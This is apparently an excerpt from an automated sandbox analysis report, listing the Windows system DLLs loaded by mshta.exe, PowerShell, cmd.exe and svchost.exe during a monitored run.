Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
